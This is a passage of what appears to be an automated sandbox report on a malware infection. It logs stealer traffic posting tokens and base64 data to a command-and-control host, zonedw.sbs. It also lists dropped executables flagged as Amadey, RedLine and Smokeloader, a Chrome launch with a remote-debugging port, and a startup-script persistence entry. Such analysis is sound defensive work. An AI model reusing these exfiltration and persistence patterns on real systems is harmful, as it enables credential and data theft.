name="build_id"e411cf62bcba04d74fc6b505b9235404------IW479RIW47G4E3W4EU37Cont
2024-12-13 17:59:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:59:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:59:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.7	50401	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:59:13 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----B1VKX4WLNYCBAIMGLF37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 98625 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:59:13 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 31 56 4b 58 34 57 4c 4e 59 43 42 41 49 4d 47 4c 46 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 42 31 56 4b 58 34 57 4c 4e 59 43 42 41 49 4d 47 4c 46 33 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 42 31 56 4b 58 34 57 4c 4e 59 43 42 41 49 4d 47 4c 46 33 37 0d 0a 43 6f 6e 74 Data Ascii: ------B1VKX4WLNYCBAIMGLF37Content-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------B1VKX4WLNYCBAIMGLF37Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------B1VKX4WLNYCBAIMGLF37Cont
2024-12-13 17:59:13 UTC	16355	OUT	Data Raw: 55 55 55 55 41 46 46 46 46 41 42 53 55 74 46 41 43 55 55 55 55 41 46 4a 53 30 55 41 4a 52 52 52 51 41 55 6c 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 55 55 55 55 41 46 42 6f 6f 4e 41 43 55 55 55 55 41 46 46 46 46 41 43 55 55 74 4a 51 41 6c 46 4c 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 52 52 52 51 41 6c 46 46 46 41 42 53 47 6c 70 44 51 41 55 55 55 55 41 46 4a 53 30 6c 41 42 51 61 4b 4b 41 45 6f 70 61 53 67 41 6f 6f 6f 6f 41 4b 53 6c 6f 6f 41 53 69 69 69 67 42 4b 4b 57 6b 6f 41 4b 4b 4b 4b 41 45 6f 6f 6f 6f 41 4b 53 6c 70 4b 41 43 6b 70 61 53 67 41 6f 6f 6f 6f 41 31 36 4b 4b 4b 41 43 69 69 69 67 41 6f 6f 6f 6f 41 53 76 4d 66 69 55 76 38 41 59 2f 69 7a 77 78 34 6d 58 68 49 70 78 62 7a 74 2f 73 35 7a 2f Data Ascii: UUUUAFFFFABSUtFACUUUUAFJS0UAJRRRQAUlLRQAlFFFABRRRQAUUUUAFBooNACUUUUAFFFFACUUtJQAlFLRQAlFFFABRRRQAlFFFABRRRQAlFFFABRRRQAlFFFABSGlpDQAUUUUAFJS0lABQaKKAEopaSgAooooAKSlooASiiigBKKWkoAKKKKAEooooAKSlpKACkpaSgAooooA16KKKACiiigAooooASvMfiUv8AY/izwx4mXhIpxbzt/s5z/
2024-12-13 17:59:13 UTC	16355	OUT	Data Raw: 58 74 35 66 52 74 48 6d 5a 34 57 4f 6c 7a 56 62 64 69 56 66 61 70 56 2b 74 51 67 31 49 44 58 71 4a 48 46 59 6e 55 38 31 4b 6f 79 61 69 58 72 55 79 34 37 35 6f 73 5a 76 79 46 78 6e 33 71 49 75 38 54 5a 51 6b 56 30 57 6c 65 48 70 62 77 43 57 34 4a 53 49 39 42 33 4e 64 52 44 34 61 30 6c 49 67 72 57 6f 6b 39 53 35 35 72 68 72 59 36 6c 42 38 75 35 32 55 73 42 55 71 4b 37 30 4f 4a 73 72 78 5a 78 74 59 34 63 56 63 48 31 72 62 31 48 77 66 61 4d 50 4f 73 43 59 5a 6c 35 41 37 47 73 44 4d 6b 55 6a 52 54 4c 74 6b 55 34 59 56 35 39 53 74 43 57 73 54 48 45 59 57 56 46 33 65 78 4d 4b 73 78 4e 7a 56 51 4e 79 4b 6d 6a 50 4e 65 64 56 6c 71 63 36 4e 69 32 63 35 46 62 31 72 4a 6c 4b 35 6d 32 62 70 57 37 5a 53 56 77 54 33 4c 6a 6f 58 37 75 50 7a 37 4f 52 44 32 55 6b 66 57 75 Data Ascii: Xt5fRtHmZ4WOlzVbdiVfapV+tQg1IDXqJHFYnU81KoyaiXrUy475osZvyFxn3qIu8TZQkV0WleHpbwCW4JSI9B3NdRD4a0lIgrWok9S55rhrY6lB8u52UsBUqK70OJsrxZxtY4cVcH1rb1HwfaMPOsCYZl5A7GsDMkUjRTLtkU4YV59StCWsTHEYWVF3exMKsxNzVQNyKmjPNedVlqc6Ni2c5Fb1rJlK5m2bpW7ZSVwT3LjoX7uPz7ORD2UkfWu
2024-12-13 17:59:13 UTC	16355	OUT	Data Raw: 4c 77 73 59 6a 79 55 75 4a 6c 7a 39 4a 47 72 71 5a 66 38 41 56 50 37 71 66 35 56 7a 50 77 2f 50 2f 45 69 6e 2f 77 43 76 79 66 38 41 39 47 4e 51 42 31 66 57 69 6c 48 53 69 67 42 4b 4b 4b 4b 41 43 6b 6f 70 61 41 45 78 53 55 74 4c 51 41 32 6b 7a 54 73 55 6d 4b 41 4f 48 31 35 64 33 6a 37 54 51 41 54 2b 37 42 50 48 75 61 36 31 77 32 7a 39 32 71 37 6a 30 7a 58 4f 61 68 6b 66 45 4b 7a 32 70 76 50 32 5a 75 50 7a 72 6f 50 4e 75 63 38 32 35 78 37 4d 4b 74 45 4d 57 52 6c 69 69 33 4f 42 6e 67 48 61 4b 52 49 59 34 77 46 7a 79 54 6e 6b 30 65 5a 50 2f 77 41 2b 72 66 38 41 66 61 31 45 42 4f 58 4c 79 51 4d 78 42 79 76 7a 44 69 71 4a 4c 47 7a 50 51 44 30 36 30 30 49 33 6e 4e 6b 4c 73 2f 68 48 70 51 5a 4a 2b 76 32 5a 76 2b 2b 68 52 35 73 2f 48 2b 6a 4e 7a 2f 74 69 67 43 4e Data Ascii: LwsYjyUuJlz9JGrqZf8AVP7qf5VzPw/P/Ein/wCvyf8A9GNQB1fWilHSigBKKKKACkopaAExSUtLQA2kzTsUmKAOH15d3j7TQAT+7BPHua61w2z92q7j0zXOahkfEKz2pvP2ZuPzroPNuc825x7MKtEMWRlii3OBngHaKRIY4wFzyTnk0eZP/wA+rf8Afa1EBOXLyQMxByvzDiqJLGzPQD0600I3nNkLs/hHpQZJ+v2Zv++hR5s/H+jNz/tigCN
2024-12-13 17:59:13 UTC	16355	OUT	Data Raw: 70 78 64 6d 6d 4e 53 6c 73 39 6a 48 62 56 72 39 4a 4d 4e 5a 6c 6c 55 34 4f 31 54 79 66 38 4d 59 71 5a 74 59 6d 55 74 2f 6f 45 70 41 58 63 4d 44 72 57 76 67 65 67 78 52 67 65 67 34 36 56 73 68 47 44 4c 72 56 32 34 68 4d 46 6c 49 43 78 47 34 4d 4f 67 72 63 58 4a 55 45 39 78 54 73 44 47 4f 50 79 6f 41 34 70 67 4a 53 5a 70 39 4a 69 67 44 6b 37 67 2f 38 58 4c 73 76 2b 76 52 76 36 31 31 31 63 66 65 6e 62 38 53 62 48 2f 72 30 62 2b 74 64 50 35 68 39 61 41 4c 4f 52 54 66 78 71 44 7a 50 65 6b 33 6d 67 43 63 39 61 53 6f 64 35 6f 38 77 30 41 53 45 6d 6d 6d 6f 7a 49 61 54 64 51 41 2b 6b 4a 46 4d 4a 4e 4d 4c 55 41 50 4c 55 77 6d 6d 46 36 4e 31 41 44 73 30 30 6d 6d 6c 71 61 57 6f 41 63 54 54 53 61 61 54 52 6e 69 67 42 63 30 32 6b 7a 53 5a 6f 41 55 6d 6d 35 70 43 61 54 Data Ascii: pxdmmNSls9jHbVr9JMNZllU4O1Tyf8MYqZtYmUt/oEpAXcMDrWvgegxRgeg46VshGDLrV24hMFlICxG4MOgrcXJUE9xTsDGOPyoA4pgJSZp9JigDk7g/8XLsv+vRv6111cfenb8SbH/r0b+tdP5h9aALORTfxqDzPek3mgCc9aSod5o8w0ASEmmmozIaTdQA+kJFMJNMLUAPLUwmmF6N1ADs00mmlqaWoAcTTSaaTRnigBc02kzSZoAUmm5pCaT
2024-12-13 17:59:13 UTC	16355	OUT	Data Raw: 62 49 78 42 4f 4e 78 50 4a 78 6e 6a 50 51 64 4b 35 71 34 73 45 66 79 78 4e 6f 31 33 4a 72 69 36 74 48 4a 4c 64 69 31 63 35 69 2b 30 41 67 2b 62 6a 42 51 4a 74 2b 58 4a 78 6a 6f 4e 75 51 66 61 53 44 70 63 39 45 71 43 30 76 49 4c 36 45 7a 57 30 6d 2b 4d 4f 38 5a 4f 43 50 6d 56 69 72 44 6e 30 49 49 72 68 6c 74 35 70 2f 47 46 6e 64 4a 70 51 67 6b 2b 33 53 72 63 46 64 4e 6c 44 6d 50 5a 49 75 58 75 53 64 72 71 33 79 6b 4b 42 67 5a 55 5a 34 35 62 46 59 57 2b 6e 36 4a 4c 59 4c 6f 4b 4b 57 31 47 58 37 51 58 30 75 53 61 4e 55 33 79 4e 47 78 6a 51 44 7a 6c 78 74 41 77 53 46 79 44 78 6a 46 48 53 34 33 76 62 2b 75 76 38 41 6b 65 68 55 56 7a 2f 67 75 47 65 33 38 4f 72 44 50 45 30 57 79 34 6e 38 74 47 68 61 45 42 50 4d 59 72 68 47 4a 4b 72 6a 47 42 6b 34 47 4b 36 43 68 Data Ascii: bIxBONxPJxnjPQdK5q4sEfyxNo13Jri6tHJLdi1c5i+0Ag+bjBQJt+XJxjoNuQfaSDpc9EqC0vIL6EzW0m+MO8ZOCPmVirDn0IIrhlt5p/GFndJpQgk+3SrcFdNlDmPZIuXuSdrq3ykKBgZUZ45bFYW+n6JLYLoKKW1GX7QX0uSaNU3yNGxjQDzlxtAwSFyDxjFHS43vb+uv8AkehUVz/guGe38OrDPE0Wy4n8tGhaEBPMYrhGJKrjGBk4GK6Ch
2024-12-13 17:59:13 UTC	495	OUT	Data Raw: 78 7a 33 70 69 36 37 71 71 61 70 4c 71 63 57 6f 33 4d 46 39 4d 54 76 6e 67 6b 4d 62 48 50 55 5a 58 47 42 30 34 48 48 46 41 48 6f 73 4f 74 53 33 4a 6a 31 44 52 4a 70 33 75 4a 74 58 73 37 47 65 34 32 6b 53 58 61 4c 46 6a 4c 6a 75 48 59 4d 53 44 31 77 4d 39 4b 7a 72 79 53 57 79 67 31 4c 52 35 39 51 52 4c 4c 55 4a 57 74 39 4c 73 70 48 32 77 52 52 65 66 6e 37 51 33 38 4b 44 35 53 41 33 33 6a 6b 6e 70 31 34 34 2b 4a 4e 64 61 34 6c 75 44 72 57 6f 6d 65 61 50 79 70 4a 44 64 50 75 64 50 37 70 4f 63 6b 63 6e 69 6b 2f 34 53 4c 57 2f 77 43 7a 2f 77 43 7a 2f 77 43 32 4e 51 2b 78 62 50 4c 2b 7a 66 61 6e 38 76 62 2f 41 48 64 75 63 59 39 71 41 4f 75 38 63 32 63 64 72 34 54 30 4f 47 31 65 30 65 7a 74 62 69 34 67 69 65 47 36 69 6c 4d 67 77 68 33 6e 59 78 2b 38 51 78 2f 32 Data Ascii: xz3pi67qqapLqcWo3MF9MTvngkMbHPUZXGB04HHFAHosOtS3Jj1DRJp3uJtXs7Ge42kSXaLFjLjuHYMSD1wM9KzrySWyg1LR59QRLLUJWt9LspH2wRRefn7Q38KD5SA33jknp144+JNda4luDrWomeaPypJDdPudP7pOckcnik/4SLW/wCz/wCz/wC2NQ+xbPL+zfan8vb/AHducY9qAOu8c2cdr4T0OG1e0eztbi4gieG6ilMgwh3nYx+8Qx/2
2024-12-13 17:59:14 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:59:14 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.7	50404	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:59:16 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----26FU3EKF37QIE37Y5FUS User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:59:16 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 32 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 32 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 32 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 55 53 0d 0a 43 6f 6e 74 Data Ascii: ------26FU3EKF37QIE37Y5FUSContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------26FU3EKF37QIE37Y5FUSContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------26FU3EKF37QIE37Y5FUSCont
2024-12-13 17:59:17 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:59:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:59:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.7	50405	116.203.10.31	443

Timestamp	Bytes transferred	Direction	Data
2024-12-13 17:59:18 UTC	322	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----PP89HD2DTRQQQIWT2VSR User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: zonedw.sbs Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-12-13 17:59:18 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 50 50 38 39 48 44 32 44 54 52 51 51 51 49 57 54 32 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 32 64 66 37 30 34 63 33 34 61 63 39 65 32 34 37 34 34 61 38 30 37 34 36 39 36 30 66 63 31 63 0d 0a 2d 2d 2d 2d 2d 2d 50 50 38 39 48 44 32 44 54 52 51 51 51 49 57 54 32 56 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 50 50 38 39 48 44 32 44 54 52 51 51 51 49 57 54 32 56 53 52 0d 0a 43 6f 6e 74 Data Ascii: ------PP89HD2DTRQQQIWT2VSRContent-Disposition: form-data; name="token"32df704c34ac9e24744a80746960fc1c------PP89HD2DTRQQQIWT2VSRContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------PP89HD2DTRQQQIWT2VSRCont
2024-12-13 17:59:19 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 17:59:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-13 17:59:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	12:52:07
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xe00000
File size:	3'292'160 bytes
MD5 hash:	F401F240C068BAC2C47C4BEB9446D2A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1308657171.0000000000E01000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:52:11
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0x360000
File size:	3'292'160 bytes
MD5 hash:	F401F240C068BAC2C47C4BEB9446D2A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.1349075912.0000000000361000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
Antivirus matches:	Detection: 61%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:42:00
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0x360000
File size:	3'292'160 bytes
MD5 hash:	F401F240C068BAC2C47C4BEB9446D2A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	14:42:13
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1014844001\BlueMail.exe"
Imagebase:	0xf90000
File size:	1'204'768 bytes
MD5 hash:	D39986C91EE9D1291E85711894112178
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000002.2328283170.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000E.00000002.2270653977.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: 0000000E.00000002.2324029799.00000000044B4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:42:19
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe"
Imagebase:	0xb10000
File size:	727'552 bytes
MD5 hash:	28E568616A7B792CAC1726DEB77D9039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:42:20
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:42:26
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1014879001\c2bea0d661.exe"
Imagebase:	0x400000
File size:	393'728 bytes
MD5 hash:	DFD5F78A711FA92337010ECC028470B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.3453206176.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 67%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	14:42:27
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe"
Imagebase:	0xb10000
File size:	727'552 bytes
MD5 hash:	28E568616A7B792CAC1726DEB77D9039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:42:27
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe"
Imagebase:	0xb10000
File size:	727'552 bytes
MD5 hash:	28E568616A7B792CAC1726DEB77D9039
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:42:35
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1014880001\8f25543307.exe"
Imagebase:	0x400000
File size:	1'936'384 bytes
MD5 hash:	FE4E63699F62090A1BC0006AB3F7856C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.3185422148.0000000000CBC000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000014.00000002.3194281955.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	14:42:38
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1014844001\BlueMail.exe"
Imagebase:	0xb0000
File size:	1'204'768 bytes
MD5 hash:	D39986C91EE9D1291E85711894112178
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:42:38
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
Imagebase:	0x4f0000
File size:	1'204'768 bytes
MD5 hash:	D39986C91EE9D1291E85711894112178
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000016.00000002.2582870539.0000000002802000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: 00000016.00000002.2789644908.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:42:39
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user~1\AppData\Local\Temp\7725ce688f\Gxtuum.exe
Imagebase:	0xcb0000
File size:	1'204'768 bytes
MD5 hash:	D39986C91EE9D1291E85711894112178
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000017.00000002.2587726358.0000000003031000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:42:45
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\1014881001\a629a70424.exe"
Imagebase:	0x110000
File size:	2'660'864 bytes
MD5 hash:	2A78CE9F3872F5E591D643459CABE476
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:42:47
Start date:	13/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:42:48
Start date:	13/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2584 --field-trial-handle=2388,i,2229604721330968177,18404601518371306528,262144 /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:42:51
Start date:	13/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs"
Imagebase:	0x7ff643090000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:42:52
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Local\Temp\vmwin.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\vmwin.exe"
Imagebase:	0xe60000
File size:	1'204'768 bytes
MD5 hash:	D39986C91EE9D1291E85711894112178
